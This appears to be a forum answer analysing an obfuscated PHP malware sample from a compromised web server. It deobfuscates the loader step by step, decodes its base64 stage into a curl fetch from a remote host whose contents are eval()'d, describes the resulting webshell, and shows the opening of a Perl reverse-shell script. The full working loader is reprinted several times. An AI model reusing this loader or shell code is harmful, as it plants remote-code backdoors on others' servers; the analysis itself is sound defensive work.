Need help decoding this
<?php /* NOTE(review): obfuscated loader, kept verbatim. yprr503() only concatenates its three arguments; the $vcbf840{n} index lookups into the alphabet string assemble $smyo112 = "call_user_func_array", $uohg939 = "create_function" and $jyhp869 = "eval(base64_decode('...'));". The final statement therefore compiles a function whose body starts with "}" and ends with "//", so the eval runs as soon as create_function() processes it; the base64 text is a curl fetch of a remote .txt whose contents are eval()'d (see the decoded lines in the answer). The curly-brace string offset syntax $var{n} was removed in PHP 8.0, so this only runs on PHP 7.x or older. A file containing this on a web server is an indicator of compromise, not a harmless artefact. */ $vcbf840= "eC.vZ176u(onAK0F4H D_RNwGygrx9Y5)WpIlMtfhQ2P-S;mEbq8OXjJTsc*kiVB,L3z+ad/U";function yprr503($ccun221,$ipue244,$tgju488){return ''.$ccun221.''.$ipue244.''.$tgju488.'';}$xjow903 = yprr503($vcbf840{58},$vcbf840{69}.$vcbf840{36},$vcbf840{36});$zjcn038 = yprr503($vcbf840{20}.$vcbf840{8},$vcbf840{57}.$vcbf840{0},'');$llof213 = yprr503($vcbf840{27},$vcbf840{20},$vcbf840{39});$nogd067 = yprr503($vcbf840{8},'',$vcbf840{11});$fsps364 = yprr503($vcbf840{58},$vcbf840{20},$vcbf840{69}.$vcbf840{27});$kjhe036 = yprr503($vcbf840{27},$vcbf840{69},$vcbf840{25});$smyo112 =yprr503(yprr503($xjow903,'',$zjcn038),yprr503($llof213,$nogd067,''),yprr503($fsps364,'',$kjhe036));$gopp378 = yprr503($vcbf840{58},$vcbf840{27},$vcbf840{0});$oont490 = yprr503($vcbf840{69},$vcbf840{38},'');$lllq180 = yprr503($vcbf840{0},'',$vcbf840{20});$ecnr938 = yprr503($vcbf840{39},$vcbf840{8},$vcbf840{11});$ffdi480 = yprr503($vcbf840{58},$vcbf840{38},'');$dxkt204 = yprr503($vcbf840{61},$vcbf840{10},'');$icbz544 = yprr503('',$vcbf840{11},'');$uohg939 = yprr503( yprr503($gopp378,$oont490,$lllq180), yprr503($ecnr938,'',$ffdi480), yprr503($dxkt204,'',$icbz544));$idgk110 = yprr503($vcbf840{0},'',$vcbf840{3});$opvu721= yprr503($vcbf840{69},$vcbf840{36},$vcbf840{9});$mtbg524 = yprr503('',$vcbf840{49},$vcbf840{69});$yxfs212 = yprr503($vcbf840{57},$vcbf840{0},$vcbf840{7});$vesg899 = yprr503($vcbf840{16},$vcbf840{20},$vcbf840{70});$ehjl604 = yprr503($vcbf840{0},$vcbf840{58},$vcbf840{10});$bxlr460 = yprr503($vcbf840{70},$vcbf840{0},$vcbf840{9});$jyhp869 = yprr503(yprr503($idgk110,$opvu721,''),yprr503('','',$mtbg524),yprr503($yxfs212,$vesg899.$ehjl604,$bxlr460))."'JGNoID0gY3VybF9pbml0KCdodHRwOi8vZG9tYWlubmFtZXNwYWNlLnRvcC9sZi50eHQnKTtjdXJsX3NldG9wdCgkY2gsIENVUkxPUFRfUkVUVVJOVFJBTlNGRVIsIDEpOyRyZXN1bHQgPSBjdXJsX2V4ZWMoJGNoKTtldmFsKCc/PicuJHJlc3VsdCk7'".yprr503($vcbf840{32}.$vcbf840{32},'',$vcbf840{46});$smyo112($uohg939,array('','}'.$jyhp869.'//'));?>
Phase 1:
<?php /* NOTE(review): Phase 1 is the sample verbatim. The $vcbf840{n} lookups resolve to call_user_func_array('create_function', ['', '}eval(base64_decode('...'));//']), i.e. the eval executes the moment create_function() processes the body, because the leading "}" closes the empty function and the trailing "//" hides the brace PHP appends. The $var{n} string offset syntax was removed in PHP 8.0, so this loader only works on PHP 7.x or older. */ $vcbf840= "eC.vZ176u(onAK0F4H D_RNwGygrx9Y5)WpIlMtfhQ2P-S;mEbq8OXjJTsc*kiVB,L3z+ad/U";function yprr503($ccun221,$ipue244,$tgju488){return ''.$ccun221.''.$ipue244.''.$tgju488.'';}$xjow903 = yprr503($vcbf840{58},$vcbf840{69}.$vcbf840{36},$vcbf840{36});$zjcn038 = yprr503($vcbf840{20}.$vcbf840{8},$vcbf840{57}.$vcbf840{0},'');$llof213 = yprr503($vcbf840{27},$vcbf840{20},$vcbf840{39});$nogd067 = yprr503($vcbf840{8},'',$vcbf840{11});$fsps364 = yprr503($vcbf840{58},$vcbf840{20},$vcbf840{69}.$vcbf840{27});$kjhe036 = yprr503($vcbf840{27},$vcbf840{69},$vcbf840{25});$smyo112 =yprr503(yprr503($xjow903,'',$zjcn038),yprr503($llof213,$nogd067,''),yprr503($fsps364,'',$kjhe036));$gopp378 = yprr503($vcbf840{58},$vcbf840{27},$vcbf840{0});$oont490 = yprr503($vcbf840{69},$vcbf840{38},'');$lllq180 = yprr503($vcbf840{0},'',$vcbf840{20});$ecnr938 = yprr503($vcbf840{39},$vcbf840{8},$vcbf840{11});$ffdi480 = yprr503($vcbf840{58},$vcbf840{38},'');$dxkt204 = yprr503($vcbf840{61},$vcbf840{10},'');$icbz544 = yprr503('',$vcbf840{11},'');$uohg939 = yprr503( yprr503($gopp378,$oont490,$lllq180), yprr503($ecnr938,'',$ffdi480), yprr503($dxkt204,'',$icbz544));$idgk110 = yprr503($vcbf840{0},'',$vcbf840{3});$opvu721= yprr503($vcbf840{69},$vcbf840{36},$vcbf840{9});$mtbg524 = yprr503('',$vcbf840{49},$vcbf840{69});$yxfs212 = yprr503($vcbf840{57},$vcbf840{0},$vcbf840{7});$vesg899 = yprr503($vcbf840{16},$vcbf840{20},$vcbf840{70});$ehjl604 = yprr503($vcbf840{0},$vcbf840{58},$vcbf840{10});$bxlr460 = yprr503($vcbf840{70},$vcbf840{0},$vcbf840{9});$jyhp869 = yprr503(yprr503($idgk110,$opvu721,''),yprr503('','',$mtbg524),yprr503($yxfs212,$vesg899.$ehjl604,$bxlr460))."'JGNoID0gY3VybF9pbml0KCdodHRwOi8vZG9tYWlubmFtZXNwYWNlLnRvcC9sZi50eHQnKTtjdXJsX3NldG9wdCgkY2gsIENVUkxPUFRfUkVUVVJOVFJBTlNGRVIsIDEpOyRyZXN1bHQgPSBjdXJsX2V4ZWMoJGNoKTtldmFsKCc/PicuJHJlc3VsdCk7'".yprr503($vcbf840{32}.$vcbf840{32},'',$vcbf840{46});$smyo112($uohg939,array('','}'.$jyhp869.'//'));?>
Phase 2 (beautified, with the helper and alphabet string renamed):
<?php $mal_string = "eC.vZ176u(onAK0F4H D_RNwGygrx9Y5)WpIlMtfhQ2P-S;mEbq8OXjJTsc*kiVB,L3z+ad/U"; // 73-character alphabet (indices 0-72); every function name below is assembled one character at a time from it via $mal_string{n}
/**
 * Plain three-way string concatenation: the interleaved '' literals add
 * nothing, so the result is simply $param1 . $param2 . $param3.
 * The sample routes every string build through this helper, apparently
 * so that no sensitive name ("eval", "create_function", ...) appears as a
 * literal in the file.
 */
function fun1($param1, $param2, $param3)
{
return '' . $param1 . '' . $param2 . '' . $param3 . '';
}
// --- First name: "call" . "_use" . "r_fun" . "c_array" = "call_user_func_array" ---
$xjow903 = fun1($mal_string{58}, $mal_string{69} . $mal_string{36}, $mal_string{36}); // "call"
$zjcn038 = fun1($mal_string{20} . $mal_string{8}, $mal_string{57} . $mal_string{0}, ''); // "_use"
$llof213 = fun1($mal_string{27}, $mal_string{20}, $mal_string{39}); // "r_f"
$nogd067 = fun1($mal_string{8}, '', $mal_string{11}); // "un"
$fsps364 = fun1($mal_string{58}, $mal_string{20}, $mal_string{69} . $mal_string{27}); // "c_ar"
$kjhe036 = fun1($mal_string{27}, $mal_string{69}, $mal_string{25}); // "ray"
$smyo112 = fun1(fun1($xjow903, '', $zjcn038) , fun1($llof213, $nogd067, '') , fun1($fsps364, '', $kjhe036)); // "call_user_func_array"
// --- Second name: "cre" . "at" . "e_" . "fun" . "ct" . "io" . "n" = "create_function" (index 38 of the alphabet is 't') ---
$gopp378 = fun1($mal_string{58}, $mal_string{27}, $mal_string{0}); // "cre"
$oont490 = fun1($mal_string{69}, $mal_string{38}, ''); // "at"
$lllq180 = fun1($mal_string{0}, '', $mal_string{20}); // "e_"
$ecnr938 = fun1($mal_string{39}, $mal_string{8}, $mal_string{11}); // "fun"
$ffdi480 = fun1($mal_string{58}, $mal_string{38}, ''); // "ct"
$dxkt204 = fun1($mal_string{61}, $mal_string{10}, ''); // "io"
$icbz544 = fun1('', $mal_string{11}, ''); // "n"
$uohg939 = fun1(fun1($gopp378, $oont490, $lllq180) , fun1($ecnr938, '', $ffdi480) , fun1($dxkt204, '', $icbz544)); // "create_function"
// --- Payload source text: "ev" . "al(" . "ba" . "se6" . "4_d" . "eco" . "de(" . "'<base64>'" . "));" ---
$idgk110 = fun1($mal_string{0}, '', $mal_string{3}); // "ev"
$opvu721 = fun1($mal_string{69}, $mal_string{36}, $mal_string{9}); // "al("
$mtbg524 = fun1('', $mal_string{49}, $mal_string{69}); // "ba"
$yxfs212 = fun1($mal_string{57}, $mal_string{0}, $mal_string{7}); // "se6"
$vesg899 = fun1($mal_string{16}, $mal_string{20}, $mal_string{70}); // "4_d"
$ehjl604 = fun1($mal_string{0}, $mal_string{58}, $mal_string{10}); // "eco"
$bxlr460 = fun1($mal_string{70}, $mal_string{0}, $mal_string{9}); // "de("
$jyhp869 = fun1(fun1($idgk110, $opvu721, '') , fun1('', '', $mtbg524) , fun1($yxfs212, $vesg899 . $ehjl604, $bxlr460)) . "'JGNoID0gY3VybF9pbml0KCdodHRwOi8vZG9tYWlubmFtZXNwYWNlLnRvcC9sZi50eHQnKTtjdXJsX3NldG9wdCgkY2gsIENVUkxPUFRfUkVUVVJOVFJBTlNGRVIsIDEpOyRyZXN1bHQgPSBjdXJsX2V4ZWMoJGNoKTtldmFsKCc/PicuJHJlc3VsdCk7'" . fun1($mal_string{32} . $mal_string{32}, '', $mal_string{46}); // "eval(base64_decode('JGNo...'));" -- the last fun1() joins ')' . ')' and ';' into "));"
// Equivalent to: call_user_func_array('create_function', ['', '}eval(base64_decode('...'));//'])
$smyo112($uohg939, array(
'', // empty parameter list for the generated function
'}' . $jyhp869 . '//' // the leading "}" closes the empty function body, so the eval executes as soon as create_function() compiles this source; the trailing "//" comments out the closing brace create_function() appends
)); ?>
Phase 3 (index lookups replaced with the corresponding characters from mal_string):
<?php $mal_string = "eC.vZ176u(onAK0F4H D_RNwGygrx9Y5)WpIlMtfhQ2P-S;mEbq8OXjJTsc*kiVB,L3z+ad/U"; // 73-character alphabet (indices 0-72) from which every name below is picked character by character
/**
 * Three-way string concatenation; the '' literals contribute nothing, so
 * the result is $param1 . $param2 . $param3. Every string in the sample
 * is built through this helper, which keeps the assembled function names
 * out of the file as literals.
 */
function fun1($param1, $param2, $param3)
{
return '' . $param1 . '' . $param2 . '' . $param3 . '';
}
// Illustrative only: the bare letters stand for the single-character strings
// pulled out of $mal_string; this phase is not runnable PHP.
$xjow903 = fun1(c, a . l, l); // "call"
$zjcn038 = fun1(_ . u, s . e, ''); // "_use"
$llof213 = fun1(r, _, f); // "r_f"
$nogd067 = fun1(u, '', n); // "un"
$fsps364 = fun1(c, _, a . r); // "c_ar"
$kjhe036 = fun1(r, a, y); // "ray"
$smyo112 = fun1(fun1($xjow903, '', $zjcn038) , fun1($llof213, $nogd067, '') , fun1($fsps364, '', $kjhe036)); // "call_user_func_array"
$gopp378 = fun1(c, r, e); // "cre"
$oont490 = fun1(a, n, ''); // transcription slip: $mal_string{38} is 't', not 'n', so this is "at"
$lllq180 = fun1(e, '', _); // "e_"
$ecnr938 = fun1(f, u, n); // "fun"
$ffdi480 = fun1(c, n, ''); // transcription slip: $mal_string{38} is 't', not 'n', so this is "ct"
$dxkt204 = fun1(i, o, ''); // "io"
$icbz544 = fun1('', n, ''); // "n"
$uohg939 = fun1(fun1($gopp378, $oont490, $lllq180) , fun1($ecnr938, '', $ffdi480) , fun1($dxkt204, '', $icbz544)); // "create_function" (with the two 't' corrections above)
$idgk110 = fun1(e, '', v); // "ev"
$opvu721 = fun1(a, l, (); // "al("
$mtbg524 = fun1('', b, a); // "ba"
$yxfs212 = fun1(s, e, 6); // "se6"
$vesg899 = fun1(4, _, d); // "4_d"
$ehjl604 = fun1(e, c, o); // "eco"
$bxlr460 = fun1(d, e, (); // "de("
$jyhp869 = fun1(fun1($idgk110, $opvu721, '') , fun1('', '', $mtbg524) , fun1($yxfs212, $vesg899 . $ehjl604, $bxlr460)) . "'JGNoID0gY3VybF9pbml0KCdodHRwOi8vZG9tYWlubmFtZXNwYWNlLnRvcC9sZi50eHQnKTtjdXJsX3NldG9wdCgkY2gsIENVUkxPUFRfUkVUVVJOVFJBTlNGRVIsIDEpOyRyZXN1bHQgPSBjdXJsX2V4ZWMoJGNoKTtldmFsKCc/PicuJHJlc3VsdCk7'" . fun1() . ), '', ;); // "eval(base64_decode('JGNo...'));" -- the garbled tail is fun1(')' . ')', '', ';'), i.e. "));"
// Net effect: call_user_func_array('create_function', ['', '}eval(base64_decode('...'));//'])
$smyo112($uohg939, array(
'', // no parameters for the generated function
'}' . $jyhp869 . '//' // "}" closes the empty body early so the eval runs when create_function() compiles it; "//" hides the brace create_function() appends
)); ?>
We can see that fun1 is simply a concatenator used for obfuscation. Finally, you can see from the latter part of the blob that it will call eval() and base64_decode() on the remaining long text.
Phase 4 (to be continued):
$jyhp869 = fun1(fun1($idgk110, $opvu721, '') , fun1('', '', $mtbg524) , fun1($yxfs212, $vesg899 . $ehjl604, $bxlr460)) . "'JGNoID0gY3VybF9pbml0KCdodHRwOi8vZG9tYWlubmFtZXNwYWNlLnRvcC9sZi50eHQnKTtjdXJsX3NldG9wdCgkY2gsIENVUkxPUFRfUkVUVVJOVFJBTlNGRVIsIDEpOyRyZXN1bHQgPSBjdXJsX2V4ZWMoJGNoKTtldmFsKCc/PicuJHJlc3VsdCk7'" . fun1() . ), '', ;); // resolves to the source text "eval(base64_decode('JGNo...'));"; the garbled tail is fun1(')' . ')', '', ';') = "));"
After Base64 decoding, this is the payload that gets eval()'d:
// Decoded second stage (the base64 text above). It runs inside the
// create_function()/eval chain, i.e. whenever the infected file is loaded.
$ch = curl_init('http://domainnamespace.top/lf.txt'); // hard-coded download URL over plain HTTP: no TLS, no integrity check on what comes back
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); // make curl_exec() return the body as a string instead of printing it
$result = curl_exec($ch); // body on success, false on failure -- there is no error handling
eval('?>'.$result); // the leading '?>' puts eval() into inline-HTML mode, so the fetched text can carry its own '<?php' tag; whatever the remote host serves executes with the web server's privileges
This fetches the txt file and executes the PHP script it contains. You can look up the domain information for domainnamespace[.]top (defanged for safety), for instance at https://lookup.icann.org/lookup
The home page looks suspicious: https://urlscan.io/result/96bf6052-d5e3-49ca-9580-fa6432a34168
The txt file was only served to requests with specific user agents and has since been taken down, but it would have run the following code on your server:
https://urlscan.io/screenshots/a5f489b3-df37-4ccc-8421-304eea50f4f1.png
After a bit of searching, I found that the full PHP script is not saved in urlscan; however, it can be found on VirusTotal (VT):
The file is a PHP webshell (~60 KB) that essentially provides backdoor functionality.
It reads basic information from the target PHP server, on both Windows and Linux, such as the IP address and network connections; looks for config.php files and other details related to credentials and users; iterates over directories; and submits the collected details. There may also be Perl scripts still present in your temp directory that are used for the backdoor functionality by opening TCP sockets.
#!/usr/bin/perl
# Prologue of the Perl script the answer says may be left behind in the
# temp directory (the rest is omitted by the poster). Its presence is an
# indicator worth checking for during cleanup.
$SHELL="/bin/sh -i"; # command for an interactive shell, presumably attached to the socket opened in the omitted part
if (@ARGV < 1) { exit(1); } # bails out unless at least one command-line argument is supplied (its meaning is not visible here)
use Socket; # low-level socket primitives, consistent with the TCP-socket behaviour described above
... omitted ...
This backdoor was already detected in December, so your web server may have been compromised for months.
Last Submission 2019-12-13 14:41:35
Feel free to reach out if you need more help, and appreciate an accepted answer & upvotes.